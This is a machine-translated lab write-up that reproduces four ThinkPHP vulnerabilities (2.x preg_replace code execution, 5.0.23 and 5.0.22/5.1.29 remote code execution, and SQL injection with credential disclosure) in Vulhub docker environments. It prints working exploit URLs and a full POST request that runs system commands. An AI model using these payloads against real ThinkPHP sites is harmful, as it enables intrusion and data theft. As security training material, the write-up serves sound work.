Vulhub vulnerability recurrence 68_ ThinkPHP

One 、 ThinkPHP 2.x Arbitrary code execution vulnerability

Vulnerability Details

ThinkPHP 2.x In the version , Use `preg_replace` Of `/e` Pattern matching routing ：

```php

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

```

Causes the user's input parameters to be inserted into double quotation marks , Cause Arbitrary Code Execution Vulnerability .

ThinkPHP 3.0 Version because Lite This vulnerability is not fixed in mode , There is also this loophole .

Environment building

shooting range ：192.168.4.10_ubuntu

Execute the following command to start ThinkPHP 2.1 Of Demo application ：

#docker-compose up -d

After the environment starts , visit `http://your-ip:8080/` You can view the default page .

Loophole recurrence

Direct access `http://your-ip:8080/index.php?s=/index/index/name/$%[email protected]()%7D` Can execute `phpinfo()`：

Two 、 ThinkPHP5 5.0.23 Remote code execution vulnerability

Vulnerability Details

ThinkPHP It is a widely used PHP Development framework . Its 5.0.23 In previous versions , obtain method The method name is not handled correctly in the method of , Causes an attacker to call Request Class any method and construct the utilization chain , This leads to a Remote Code Execution Vulnerability .

Reference link ：

-https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003

Vulnerability environment

Execute the following command to start a default thinkphp 5.0.23 Environmental Science ：

#docker-compose up -d

After the environment starts , visit `http://your-ip:8080` You can see the default ThinkPHP Launch page .

Loophole recurrence

Send packet ：

```

POST /index.php?s=captcha HTTP/1.1

Host: localhost

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

```

Successful execution `id` command ：

3、 ... and 、 ThinkPHP5 5.0.22/5.1.29 Remote code execution vulnerability

Vulnerability Details

ThinkPHP It is a widely used PHP Development framework . Its version 5 in , Because the controller name was not handled correctly , This results in the situation that the website does not turn on forced routing （ By default ） Any method can be executed , This leads to a remote command execution vulnerability .

Reference link ：

- http://www.thinkphp.cn/topic/60400.html

- http://www.thinkphp.cn/topic/60390.html

- https://xz.aliyun.com/t/3570

Vulnerability environment

function ThinkPHP 5.0.20 edition ：

#docker-compose up -d

After the environment starts , visit `http://your-ip:8080` You can see ThinkPHP Default startup page .

Loophole recurrence

Direct access `http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1`, Can execute phpinfo：

Four 、 ThinkPHP5 SQL Inject holes && Leakage of sensitive information

Running environment

#docker-compose up -d

After starting , visit `http://your-ip/index.php?ids[]=1&ids[]=2`, You can see that the user name is displayed , It indicates that the environment runs successfully .

Loophole principle

Explanation of vulnerability principle ：

- https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html

- https://xz.aliyun.com/t/125

Exploit

visit `http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1`, The information was successfully revealed ：

Of course , This is a chicken rib SQL Inject holes . But through DEBUG page , We found the account number of the database 、 password ：

This is another sensitive information disclosure vulnerability .